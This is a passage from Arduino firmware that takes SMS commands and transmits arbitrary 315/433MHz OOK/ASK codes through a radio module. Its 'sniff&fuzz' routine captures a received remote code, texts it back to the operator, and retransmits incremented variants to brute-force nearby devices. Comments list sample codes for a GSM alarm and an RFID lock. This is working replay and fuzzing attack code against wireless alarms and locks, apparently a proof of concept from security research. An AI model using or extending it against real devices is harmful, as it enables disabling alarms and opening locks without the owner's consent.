// Optional set pulse length. (this must be set after protocol (if set). Otherwise is overridden).
// RF.setPulseLength(456);
// Optional set number of transmission repetitions.
RF.setRepeatTransmit(50); //##################### Number of Times the binary sequence will be transmitted. Default: 1 #################
// Use this to add manually specific HIGH or LOW pulses with specific length.
// int highLength = 4;
// int lowLength = 18;
// digitalWrite(11, HIGH);
// delayMicroseconds(highLength*timeDelay);
// digitalWrite(11,LOW);
// delayMicroseconds(lowLength*timeDelay);
//RF.send("101001011110101100000100"); //Hardcoded binary sequence for testing purposes.
//RF.send(5393, 24); //Example of sending decimal value. Where 24 is the code lenght.
RF.send((smsBuffer + 9));
RF.disableTransmit();
delay(1000);
}
//####### asktxD7: #############################################################################
//# Transmit on Pin D7 325/433MHz an arbitrary binary sequence with OOK/ASK Encoding/Modulation
//##############################################################################################
// ############################################################################################################################
// #### For some reasons there is a bug... rcswitch adds one zero more... so remove the last one from the signal binary!!! ####
// ############################################################################################################################
// ### Example: ###
// 1010010111101011000001000 // original signal
// 101001011110101100000100 //to use (see! one zero less at the end)
// Hard-coded binary sequence for testing purposes.
// RF.send("101001011110101100000100"); // GSM Alarm at 433MHz
// RF.send("010101010101010100001100"); // RFID RFLock at 315MHz
else if (strncmp(smsBuffer, "asktxD7:", 8) == 0) {
delay(1000);
// Transmitter is connected to Atmega 32u4 Pin D7
// Wiring of external 433/315MHz TX:
// GND >> GND
// DATA >> D7
// VCC >> VCC
RF.enableTransmit(7); //Pin D7
// Optional set protocol (default is 1, will work for most outlets)
// RF.setProtocol(2);
// Optional set pulse length. (this must be set after protocol (if set). Otherwise is overridden).
// RF.setPulseLength(456);
// Optional set number of transmission repetitions.
RF.setRepeatTransmit(50); //##################### Number of Times the binary sequence will be transmitted. Default: 1 #################
// Use this to add manually specific HIGH or LOW pulses with specific length.
// int highLength = 4;
// int lowLength = 18;
// digitalWrite(7, HIGH);
// delayMicroseconds(highLength*timeDelay);
// digitalWrite(7,LOW);
// delayMicroseconds(lowLength*timeDelay);
//RF.send("101001011110101100000100"); //Hardcoded binary sequence for testing purposes.
//RF.send(5393, 24); //Example of sending decimal value. Where 24 is the code lenght.
RF.send((smsBuffer + 9));
RF.disableTransmit();
delay(1000);
}
//####### sniff&fuzz: #####################################################################################################################
//# Listen on Pin D3 & Re-Transmit on Pin D11 325/433MHz an arbitrary binary sequence W/ basic counter with OOK/ASK Encoding/Modulation
//#########################################################################################################################################
else if (strncmp(smsBuffer, "sniff&fuzz:", 11) == 0) {
//Example: askrx:10000 will sniff for 10 seconds.
Serial.print(F("Milliseconds of Sniffing: "));
Serial.println((smsBuffer + 11));
RF.enableReceive(0); //We use D3, which is INT0, atmega32u4 chip pin #18
RF.enableTransmit(11); //Pin D7 or D11
RF.setRepeatTransmit(50);
delay(1000);
unsigned long t = millis();
//Hardcoded for now to 30s
while (millis() - t < 30000) {
//while(millis() - t < (smsBuffer+11)){
unsigned long value;
value = RF.getReceivedValue();
if (value) {
Serial.println(F("[O] Sending back the packet sniffed in 3 seconds..."));
delay(1000);
Serial.println(F("[O] Sending back the packet sniffed in 2 seconds..."));
delay(1000);
Serial.println(F("[O] Sending back the packet sniffed in 1 second..."));
delay(1000);
Serial.println(F("[O] BOOOM!"));
//fona.sendSMS(callerIDbuffer, value);
fona.sendSMS(callerIDbuffer, tobin32(value));
// delay(2000);
// fona.sendSMS(callerIDbuffer, "Fire In The Hole!");
// delay(1000);
for (int i = 0; i <= 9; i++) {
//for (int i = 1; i <= 5; i++) { // we don't care to send the same packet sniffed. For Boom PoC.
fona.sendSMS(callerIDbuffer, tobin32(value + i));
delay(1500);
RF.send(value + i, 24);
Serial.print(F("Sending: "));
Serial.println(value + i);
//delay(1500);
}
Serial.println(F("[O] Packets Sent!"));
Serial.println(F("-----------------------------------------------------------------------------------------------------"));
// reset the switch to allow more data to come
RF.resetAvailable();
} else {
//Serial.print(F("Packet Received: Unknown encoding"));
}
}
RF.disableTransmit();
RF.disableReceive();
}
//####### asktxD3: #############################################################################
//# Transmit on Pin D3 325/433MHz an arbitrary binary sequence with OOK/ASK Encoding/Modulation
//##############################################################################################
// ############################################################################################################################
// #### For some reasons there is a bug... rcswitch adds one zero more... so remove the last one from the signal binary!!! ####
// ############################################################################################################################
// ### Example: ###
// 1010010111101011000001000 // original signal
// 101001011110101100000100 //to use (see! one zero less at the end)
// Hard-coded binary sequence for testing purposes.
// RF.send("101001011110101100000100"); // GSM Alarm at 433MHz
// RF.send("010101010101010100001100"); // RFID RFLock at 315MHz
else if (strncmp(smsBuffer, "asktxD3:", 8) == 0) {
delay(1000);
// Transmitter is connected to Atmega 32u4 Pin D3
// Wiring of external 433/315MHz TX:
// GND >> GND
// DATA >> D3
// VCC >> VCC
RF.enableTransmit(3); //Pin D3
// Optional set protocol (default is 1, will work for most outlets)
// RF.setProtocol(2);
// Optional set pulse length. (this must be set after protocol (if set). Otherwise is overridden).
// RF.setPulseLength(456);
// Optional set number of transmission repetitions.
RF.setRepeatTransmit(50); //##################### Number of Times the binary sequence will be transmitted. Default: 1 #################
// Use this to add manually specific HIGH or LOW pulses with specific length.
// int highLength = 4;
// int lowLength = 18;
// digitalWrite(3, HIGH);
// delayMicroseconds(highLength*timeDelay);
// digitalWrite(3,LOW);
// delayMicroseconds(lowLength*timeDelay);